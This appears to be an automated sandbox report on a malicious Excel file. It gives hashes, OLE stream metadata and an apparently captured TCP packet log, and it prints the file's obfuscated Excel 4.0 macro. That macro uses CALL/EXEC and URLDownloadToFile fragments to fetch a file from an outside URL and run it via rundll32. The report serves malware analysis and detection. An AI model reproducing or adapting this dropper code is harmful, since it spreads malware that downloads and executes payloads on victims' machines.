MD5: | CBEA511BD35F247E4B4BF7CC5A3A7CBD |
SHA1: | 8C0D352934271350CFE6C00B7587E8DC8D062817 |
SHA-256: | 0AE86E5ABBC09E96F8C1155556CA6598C22AEBD73ACBBA8D59F2CE702D3115F8 |
SHA-512: | AEC894D9D3AACCCCC029C615D283AF4946C5150372DB0ECDD616A9D491478759068214BF03DB11631A5EFB59951150D92C1517C2C11D8C6F0DDF5C8F76734FCF |
Malicious: | true |
Joe Sandbox View: |
|
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 3.2150745788685295 |
TrID: |
|
File name: | 446446.xls |
File size: | 283136 |
MD5: | 1b62b4f4b16d6219dce4c6d145c5af79 |
SHA1: | d5bc46f3043119c020ae93121195aabbf151cf75 |
SHA256: | dd3ecdcc3a6cc81ee451f90703cc899ff43c7a05b30a6538e5f3afd73f77adb1 |
SHA512: | 1a774ebb111463491f16a88b465e959c14ba32b6a399f108abe43fef66e61b663840998efdcd504306f3b28dd052032b82e8e642ffc9f9ed05186aaedbaf420e |
SSDEEP: | 6144:DcPiTQAVW/89BQnmlcGvgZ7r3J8b5I2JK+2vYft:mwt |
File Content Preview: | ........................>.......................'..........................."...#...$...%...&.................................................................................................................................................................. |
File Icon |
---|
Icon Hash: | 74ecd4c6c3c6c4d8 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "446446.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-04-12 14:51:16 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.335261663834 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . D o c s 1 . . . . . D o c s 2 . . . . . D o c s 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 86 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.244430475899 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . J . J . / . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 35 00 00 00 1e 00 00 00 |
Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 270942 |
---|
General | |
---|---|
Stream Path: | Book |
File Type: | Applesoft BASIC program data, first line number 8 |
Stream Size: | 270942 |
Entropy: | 3.18416886572 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . D o c s 2 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 6 . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . |
Data Raw: | 09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 01 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Macro 4.0 Code |
---|
"=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CALL(Docs3!BX29&Docs3!BQ24&Docs3!BQ33&Docs3!BQ34,Docs3!BZ29&Docs3!CC33&Docs3!BY31&Docs3!CC35&Docs3!CC36,Docs3!CF29&Docs3!CF30,0,Docs3!BX9,Docs3!CD19,0,0)"=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=Docs1!BC13()
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=EXEC(Docs3!BS36&Docs3!BS37&Docs3!CF43&Docs3!CF44&Docs3!CD19&Docs3!BZ37&Docs3!BZ39&Docs3!BZ43&Docs3!BZ44)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=Docs3!BA22(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,http://living-traditions.com/blogs/click.php,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\fdinmd.fii,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,RL,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,U,,UR,,,,,,JJC,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,CBB,,,,,,,,,,,,,,,,,,,,,,,,nload,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Mo,,,,,,,,,,,,LDow,,,,,,,,,,,,,,,,,,,n,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ToFil,,,,,,,,,,,,,,,,,,,,,r,,,,,,,,,,eA,,,,,,,,,,,,,,,,,,,,,u,,,,,,,",St",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,a,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,rt,,,,,,ndl,,,,,,,,,,,,,,,,,,,,,,,,,W,,,,,,l32
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 12, 2021 17:12:28.653486967 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:28.784665108 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:28.784779072 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:28.785401106 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:28.917207003 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.014661074 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.014681101 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.014695883 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.014713049 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.014733076 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.014750004 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.014761925 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.014777899 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.014792919 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.014806032 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.014842987 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.014863014 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.014890909 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.145554066 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.145584106 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.145602942 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.145623922 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.145641088 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.145643950 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.145657063 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.145673037 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.145680904 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.145692110 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.145713091 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.145734072 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.145735979 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.145757914 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.145766020 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.145804882 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.148679972 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.148780107 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.276376009 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.276417971 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.276442051 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.276468039 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.276492119 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.276515007 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.276537895 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.276536942 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.276561975 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.276627064 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.276638031 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.276653051 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.276667118 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.276671886 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.276699066 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.276706934 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.276722908 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.276746988 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.276750088 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.276770115 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.276782036 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.276793003 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.276819944 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.276882887 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.279459953 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.279510975 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.279628038 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.407495022 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407525063 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407536983 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407556057 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407571077 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407589912 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407612085 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407629967 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407644033 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.407645941 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407663107 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407679081 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407695055 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407696009 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.407711029 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407728910 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.407730103 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407747030 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407751083 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.407762051 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407778978 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407790899 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.407794952 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407809973 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407821894 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.407824993 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407840967 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407847881 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.407859087 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407866955 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.407876015 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407891989 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.407901049 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.407936096 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.410192966 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.410219908 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.410233021 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.410244942 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.410289049 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.410351992 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.538497925 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.538533926 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.538554907 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.538583040 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.538606882 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.538619995 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.538630009 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.538644075 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.538654089 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.538677931 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.538698912 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.538703918 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.538722038 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.538728952 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.538743019 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.538768053 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.538770914 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.538790941 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.538800955 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.538814068 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.538829088 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.538836956 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.538858891 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.538858891 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.538882971 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.538883924 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.538904905 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.538907051 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.538927078 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.538934946 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.538948059 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.538954020 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.538975954 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.538976908 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.538995028 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.539000988 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.539017916 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.539024115 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.539036036 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.539045095 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.539064884 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.539068937 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.539082050 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.539091110 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.539113045 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.539113998 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.539138079 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
